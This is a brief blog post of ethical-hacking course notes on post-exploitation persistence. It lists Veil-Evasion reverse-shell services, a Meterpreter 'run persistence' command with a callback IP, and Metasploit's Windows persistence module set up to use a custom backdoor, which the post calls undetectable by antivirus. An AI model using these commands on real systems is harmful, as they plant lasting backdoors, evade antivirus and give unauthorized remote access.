Ethical Hacking - POST EXPLOITATION(2)

MAINTAINING ACCESS - Methods

1. Using a veil-evasion

  • Rev_http_service
  • Rev_tcp_service
  • Use it instead of a normal backdoor.
  • Or upload and execute from meterpreter.
  • Does not always work.

2. Using persistence module

  • run persistence -h
  • Detectable by antivirus programs.

run persistence -U -i 20 -p 80 -r 10.0.0.43

 

3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus

  • > use exploit/windows/local/persistence

  • > set session [session id]

  • > set exe::custom[backdoor location]

  • >exploit

 

posted @ 2020-02-06 19:50  晨风_Eric  阅读(114)  评论(0编辑  收藏  举报